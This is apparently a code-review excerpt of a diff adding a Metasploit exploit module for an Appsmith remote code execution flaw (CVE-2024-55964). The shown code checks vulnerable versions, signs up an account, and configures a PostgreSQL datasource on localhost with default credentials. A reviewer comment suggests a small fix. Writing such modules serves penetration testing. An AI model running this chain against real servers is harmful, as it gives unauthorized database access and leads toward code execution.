modules/exploits/linux/http/appsmith_rce_cve_2024_55964.rb

```diff
@@ -0,0 +1,182 @@
+
+    version = Rex::Version.new(version_element[1])
+    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('1.20'), Rex::Version.new('1.51'))
+
+    Exploit::CheckCode::Appears("Version #{version} detected.")
+  end
+
+  def exploit
+    user = { 'email' => "#{rand_text_alphanumeric(50)}@#{rand_text_alphanumeric(50)}.com", 'password' => rand_text_alphanumeric(10).to_s }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/users'),
+      'keep_cookies' => true,
+      'vars_post' => user
+    })
+    fail_with(Failure::Unknown, 'Failed to signup.') unless res&.code == 302
+    print_status('Successfully signed up.')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/workspaces/home')
+    })
+    fail_with(Failure::Unknown, 'Failed to access workspaces.') unless res&.code == 200
+
+    workspace_id = res.get_json_document&.dig('data')&.first&.dig('id')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/plugins/default/icons')
+    })
+    fail_with(Failure::Unknown, 'Failed to get plugin information.') unless res&.code == 200
+
+    postgresql_plugin = res.get_json_document['data']&.detect { |row| row['name'] == 'PostgreSQL' }
+    fail_with(Failure::Unknown, 'Failed to get PostgreSQL plugin information.') unless postgresql_plugin
+
+    postgresql_plugin_id = postgresql_plugin['id']
+
+    db_conf = {
+      'datasourceStorages' => {
+        'unused_env' => {
+          'datasourceConfiguration' => {
+            'authentication' => {
+              'databaseName' => 'postgres',
+              'password' => 'postgres',
+              'username' => 'postgres'
+            },
+            'connection' => {
+              'mode' => 'READ_WRITE',
+              'ssl' => { 'authType' => 'DEFAULT' }
+            },
+            'endpoints' => [
+              { 'host' => 'localhost', 'port' => '5432' }
+            ],
+            'properties' => [
+              nil,
+              { 'key' => 'Connection method', 'value' => 'STANDARD' }
+            ],
+            'sshProxy' => { 'endpoints' => [{ 'port' => '22' }] },
+            'url' => ''
+          },
+          'datasourceId' => '',
+          'environmentId' => 'unused_env',
+          'isConfigured' => true
+        }
+      },
+      'name' => rand_text_alphanumeric(20),
+      'pluginId' => postgresql_plugin_id,
+      'workspaceId' => workspace_id
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/datasources'),
+      'ctype' => 'application/json',
+      'data' => db_conf
+    })
+    fail_with(Failure::Unknown, 'Failed to save DB configuration.') unless res&.code == 201 && res.get_json_document['responseMeta']['success']
```

Comment:
I think you can do something like this as well
```suggestion
    fail_with(Failure::Unknown, 'Failed to save DB configuration.') unless res&.code == 201 && res.get_json_document&.dig('responseMeta','success')
```